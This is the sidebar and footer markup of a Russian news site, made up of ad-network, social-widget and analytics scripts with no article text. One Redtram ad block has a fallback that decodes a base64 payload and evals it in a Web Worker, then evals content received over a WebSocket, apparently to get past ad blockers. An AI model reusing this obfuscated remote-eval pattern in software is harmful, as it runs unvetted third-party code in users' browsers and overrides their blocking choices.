<script type="text/javascript">(function(){var j=183738,f=false,b=document,c=b.documentElement,e=window;function g(){var a="";a+="rt="+(new Date).getTime()%1E7*100+Math.round(Math.random()*99);a+=b.referrer?"&r="+escape(b.referrer):"";return a}function h(){var a=b.getElementsByTagName("head")[0];if(a)return a;for(a=c.firstChild;a&&a.nodeName.toLowerCase()=="#text";)a=a.nextSibling;if(a&&a.nodeName.toLowerCase()!="#text")return a;a=b.createElement("head");c.appendChild(a);return a}function i(){var a=b.createElement("script");a.setAttribute("type","text/javascript");a.setAttribute("src","http://s.luxadv.com/t/lb"+j+"_3.js?"+g());typeof a!="undefined"&&h().appendChild(a)}function d(){if(!f){f=true;i()}};if(b.addEventListener)b.addEventListener("DOMContentLoaded",d,false);else if(b.attachEvent){c.doScroll&&e==e.top&&function(){try{c.doScroll("left")}catch(a){setTimeout(arguments.callee,0);return}d()}();b.attachEvent("onreadystatechange",function(){b.readyState==="complete"&&d()})}else e.onload=d})();</script>
	


		<h2 class="namerub"><span class="rem">//</span>Новости ADWILE</h2>
<div id="smi_teaser_10167">
<center><a href="http://partner.adwile.com" rel="nofollow">Нативная реклама ADWILE</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
 (function() {
 var sm = document.createElement("script");
 sm.type = "text/javascript";
 sm.async = true;
 sm.src = "//jsn.24smi.net/d/f/10167.js";
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(sm, s);})();
</script>



<h2 class="namerub"><span class="rem">//</span>Новости advert.mirtesen.ru</h2>
<div id="smi2adblock_81549"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.advert.mirtesen.ru/data/js/81549.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>


<!-- R-50615-1 Яндекс.RTB-блок  -->
<div id="yandex_ad_R-50615-1"></div>
<script type="text/javascript">
    (function(w, d, n, s, t) {
        w[n] = w[n] || [];
        w[n].push(function() {
            Ya.Context.AdvManager.render({
                blockId: "R-50615-1",
                renderTo: "yandex_ad_R-50615-1",
                async: true
            });
        });
        t = d.getElementsByTagName("script")[0];
        s = d.createElement("script");
        s.type = "text/javascript";
        s.src = "//an.yandex.ru/system/context.js";
        s.async = true;
        t.parentNode.insertBefore(s, t);
    })(this, this.document, "yandexContextAsyncCallbacks");
</script>



		
		
		
		<!---->
			
			


		<h4 class="namerub"><span class="rem">//</span>Читайте также</h4>
<ul class="main_inf_anons">
			<li>
							<a href="http://argumenti.ru/politics/2017/10/551870?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/arhnews/69429b41a872ce4b17a6e6579f4c99d7.jpg" alt="В Госдуме призвали отказаться от иллюзий в отношении политики Эрдогана" /></a>
						<a href="http://argumenti.ru/politics/2017/10/551870?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">В Госдуме призвали отказаться от иллюзий в отношении политики Эрдогана</a>
		</li>
			<li>
							<a href="http://argumenti.ru/live/2014/12/384903?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/tabloid/3e225c9e5a292d0dd1add560698a8c46.jpg" alt="«Я бы не ставил на одну доску этих людей - и Собчак»" /></a>
						<a href="http://argumenti.ru/live/2014/12/384903?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">«Я бы не ставил на одну доску этих людей - и Собчак»</a>
		</li>
			<li>
							<a href="http://argumenti.ru/politics/2017/10/551949?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow"><img src="http://argumenti.ru/images/preview/arhnews/eae4f53bae0f05148ae98fcdd665fb2e.jpg" alt="Глава Каталонии призвал приостановить провозглашение независимости" /></a>
						<a href="http://argumenti.ru/politics/2017/10/551949?utm_source=argumenti.ru&utm_medium=tabloid&utm_campaign=tabloid" target="_blank" rel="nofollow">Глава Каталонии призвал приостановить провозглашение независимости</a>
		</li>
	</ul>
		
								
<h2 class="namerub"><span class="rem">//</span>Новости СМИ2</h2>
<div id="smi2adblock_72157"><a href="http://smi2.ru/" rel="nofollow">Новости СМИ2</a></div>
<script type="text/javascript" charset="utf-8">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.smi2.ru/data/js/72157.js'; sc.charset = 'utf-8';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>


<h2 class="namerub"><span class="rem">//</span>Новости Lentainform.com</h2>
<!-- LentaInformNews Start -->
<div id="LentaInformScriptRootN13735" class="news-block-magick">
    <div id="LentaInformPreloadN13735">
                <a href="http://lentainform.com/" target="_blank" rel="nofollow">Загрузка...</a>    
    </div>
    <script>
                        (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("LentaInformScriptRootN13735")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("LentaInformScriptRootN13735");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=13735;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src="//jsn.lentainform.com/a/r/argumenti.ru.13735.js?t="+D.getYear()+D.getMonth()+D.getDate()+D.getHours();c[ac](s);})();
    </script>
</div>
<!-- LentaInformNews End -->		
		
			
			
		<a href="http://estetfashionweek.ru/" rel="nofollow">
<img src="http://argumenti.ru/pub/images/partners/712.jpg" width="240" height="310" alt="ювелирная неделя моды"  border="0" /></a>

			
					

		
		
		
<div class="tabs">
    <h4 class="namerub"><span class="rem">//</span>Мы в соцсетях</h4>

        <input id="tab1" class="socialtabs" type="radio" name="tabs" checked>
        <label class="sociallabels vk" for="tab1" title="Wordpress"></label>
    
        <input id="tab2" class="socialtabs" type="radio" name="tabs">
        <label class="sociallabels fb" for="tab2" title="Windows"></label>
    
        <input id="tab3" class="socialtabs" type="radio" name="tabs">
        <label class="sociallabels ok" for="tab3" title="HTML5"></label>
    
        <section id="content1" class="tab-content">
<script type="text/javascript" src="//vk.com/js/api/openapi.js?115"></script>

<!-- VK Widget -->
<div id="vk_groups"></div>
<script type="text/javascript">
VK.Widgets.Group("vk_groups", {mode: 0, width: "240", height: "300", color1: 'FFFFFF', color2: '2B587A', color3: '5B7FA6'}, 14409962);
</script>

       </section>  
       <section id="content2" class="tab-content">
		<div id="fb-root"></div>
			<script>(function(d, s, id) {
		  var js, fjs = d.getElementsByTagName(s)[0];
		  if (d.getElementById(id)) return;
		  js = d.createElement(s); js.id = id;
		  js.src = "//connect.facebook.net/ru_RU/all.js#xfbml=1";
		  fjs.parentNode.insertBefore(js, fjs);
		}(document, 'script', 'facebook-jssdk'));</script>

		<div class="fb-like-box" data-href="http://www.facebook.com/argumentinedeli" data-width="240" data-height="303" data-show-faces="true" data-stream="false" data-border-color="b1bad0" data-header="true" data-rel="nofollow"></div>
        </section> 
        <section id="content3" class="tab-content">
		<div id="ok_group_widget"></div>
		<script>
		!function (d, id, did, st) {
		var js = d.createElement("script");
		js.src = "http://connect.ok.ru/connect.js";
		js.onload = js.onreadystatechange = function () {
		if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
		if (!this.executed) {
		this.executed = true;
		setTimeout(function () {
		OK.CONNECT.insertGroupWidget(id,did,st);
		}, 0);
		}
		}}
		d.documentElement.appendChild(js);
		}(document,"ok_group_widget","54308951490571","{width:240,height:335}");
		</script>
        </section>   

   </div>



	<div id="parthers_link"><a href="http://www.argumenti.ru/parthers">Новости партнеров</a>&nbsp;/<a href="http://www.argumenti.ru/info" rel="nofollow">Информация</a></div>
		<div id="block__fix-adv_r">
		<h2 class="namerub"><span class="rem">//</span>Новости Redtram</h2>
<script id="r34279" type="text/javascript">
    (function() {
        var worker34279,
            tickerID = 34279,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-ru.redtram.com/n4p/0/34/ticker_34279.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDtmdW5jdGlvbiBzZW5kVG9Tb2NrZXQoZGF0YSkge2lmICghc29ja2V0IHx8IHNvY2tldC5yZWFkeVN0YXRlID09PSBzb2NrZXQuQ0xPU0VEKSB7c29ja2V0ID0gbmV3IFdlYlNvY2tldCgid3NzOi8vbjRwLnJlZHRyYW0uY29tL3dzLyIpO3NvY2tldC5vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7cG9zdE1lc3NhZ2UoSlNPTi5zdHJpbmdpZnkoci5kYXRhKSk7fTt9aWYgKHNvY2tldCkge3NlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7c29ja2V0LnNlbmQoZGF0YSk7fSk7fX1mdW5jdGlvbiBzZW5kQ29ubmVjdGlvbihjLCByKSB7c2V0VGltZW91dChmdW5jdGlvbigpIHtpZiAoYy5yZWFkeVN0YXRlID09PSBjLk9QRU4pIHtyZXR1cm4gcigpO31yZXR1cm4gc2VuZENvbm5lY3Rpb24oYywgcik7fSwgNTApO31vbm1lc3NhZ2UgPSBmdW5jdGlvbihyKSB7IHNlbmRUb1NvY2tldChyLmRhdGEpOyB9Ow==';

                function runExternalMessage(data) {
                    worker34279.postMessage(data);
                }

                worker34279 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker34279.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker34279.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>		
	</div>

	</div>	    	<div class="our_partners">
	<div>
		<h5 class="namerub" style="text-align:left;"><span class="rem">//</span>Наши партнеры</h5>
													</div>
</div>
			<footer>


		<div class="foot_menu"><div id="menus">
		<ul class="mainmenu">
			<li><a href="http://argumenti.ru/politics?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Политика</a></li>
			<li><a href="http://argumenti.ru/economics?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Экономика</a></li>
			<li><a href="http://argumenti.ru/society?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Общество</a></li>
			<li><a href="http://argumenti.ru/world?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">В мире</a></li>			
			<li><a href="http://argumenti.ru/showbiz?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium"><nobr>Шоубиз</nobr></a></li>
			<li><a href="http://argumenti.ru/sport?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Спорт</a></li>
			<li><a href="http://argumenti.ru/rassledovanie?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=medium">Расследования</a></li>
			<li><a href="http://argumenti.ru/tourism?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Туризм</a></li>
			<li><a href="http://argumenti.ru/culture?utm_source=argumenti.ru&utm_medium=menu&utm_campaign=dropmenu">Культура</a></li>
		</ul>
</div></div>
	
	

<div class="footer_line">



	<div id="logo_footer">
		<!--noindex-->
			<div id="endline">
		<p style="margin-top:5px;">Возрастная категория сайта: <span class="plus18">18+</span><!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='//www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t44.6;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet' "+
"border='0' width='31' height='31'><\/a>")
//--></script><!--/LiveInternet--></p>
     </div>

	</div>

<!--noindex-->

	<div id="copy">
		<ul id="footer_menu">
			<li>Ваш город: /</li>
			<li><a href="http://argumenti.ru/reklama/internet.html" rel="nofollow">РЕКЛАМА</a> +7 (495) 981-68-36</li>
			<li><a href="http://argumenti.ru/pub/doc/an.pdf" target="_blank" rel="nofollow">Об издании</a></li>
		</ul>
		<p><a href="mailto:anonline@argumenti.ru" rel="nofollow">anonline@argumenti.ru</a></p>
		<p>Свободное использование в Интернет-пространстве текстов, фото и видеоматериалов, опубликованных на этом сайте, допускается при условии обязательного размещения гиперссылки на источник публикации www.argumenti.ru. Использование материалов в печатных СМИ допускается только с письменного разрешения редакции. 
					Сетевое издание "Аргументы неделi". Свидетельство о регистрации Эл № ФС77-60728 от 09 февраля 2015 г. выдано Федеральной службой по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор).
		


	</div>
	<div id = "rating">
<ul id="socnets" style="margin-bottom:48px;">
				<li><a class="vk" target="_blank" href="http://vkontakte.ru/club14409962" rel="nofollow"></a></li>
				<li><a class="tw" target="_blank" href="http://twitter.com/argumenti" rel="nofollow"></a></li>
				<li><a class="fb" target="_blank" href="https://www.facebook.com/argumentinedeli" rel="nofollow"></a></li>
				<li><a class="mm" target="_blank" href="http://my.mail.ru/community/argumenti" rel="nofollow"></a></li>
				<li><a class="ok" target="_blank" href="http://www.odnoklassniki.ru/argumenti" rel="nofollow"></a></li>
				<li><a class="in" target="_blank" href="http://instagram.com/argumenti.ru" rel="nofollow"></a></li>
			</ul>



<span class="counter">

<!-- Rating@Mail.ru logo -->
<a href="http://top.mail.ru/jump?from=1069168" rel="nofollow">
<img src="//top-fwz1.mail.ru/counter?id=1069168;t=479;l=1"
style="border:0;" height="31" width="88" alt="Рейтинг@Mail.ru" /></a>
<!-- //Rating@Mail.ru logo -->

</span>


<div id='top100counter' style="float:right"></div>
<script type="text/javascript">
var _top100q = _top100q || [];

_top100q.push(["setAccount", "1425289"]);
_top100q.push(["trackPageviewByLogo", document.getElementById("top100counter")]);


(function(){
var top100 = document.createElement("script"); top100.type = "text/javascript";

top100.async = true;
top100.src = ("https:" == document.location.protocol ? "https:" : "http:") + "//st.top100.ru/top100/top100.js";
var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(top100, s);
})();
</script>
<a style="float:right" target="_blank" href="http://www.rambler.ru/" rel="nofollow">"Партнер Рамблера"</a>




</div>
</div>

            
<!--<div id="footer_parthers"></div>-->

</footer>

</div>

<!--/noindex-->


<script type="text/javascript">
//<![CDATA[
yandex_direct_place = 'ya_direct';
yandex_partner_id = 50615;
yandex_site_bg_color = 'FFFFFF';
yandex_site_charset = 'utf-8';
yandex_ad_format = 'direct';
yandex_font_size = .75;
yandex_direct_type = 'vertical';
yandex_direct_limit = 5;
yandex_direct_header_bg_color = 'ECECEC';
yandex_direct_bg_color = 'ECECEC';
yandex_direct_border_color = 'FFFFFF';
yandex_direct_title_color = '000000';
yandex_direct_url_color = '666666';
yandex_direct_all_color = '000000';
yandex_direct_text_color = '000000';
yandex_direct_hover_color = '000000';
yandex_direct_favicon = true;
//]]>
</script>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-11186859-1', 'auto');
  ga('send', 'pageview');

</script>




<!--<script type="text/javascript" src="http://an.yandex.ru/system/context.js"></script>-->


<!--// Rating@Mail.ru logo-->

<script async="async" src="https://w.uptolike.com/widgets/v1/zp.js?pid=631008" type="text/javascript"></script>


</script>
</body>
</html>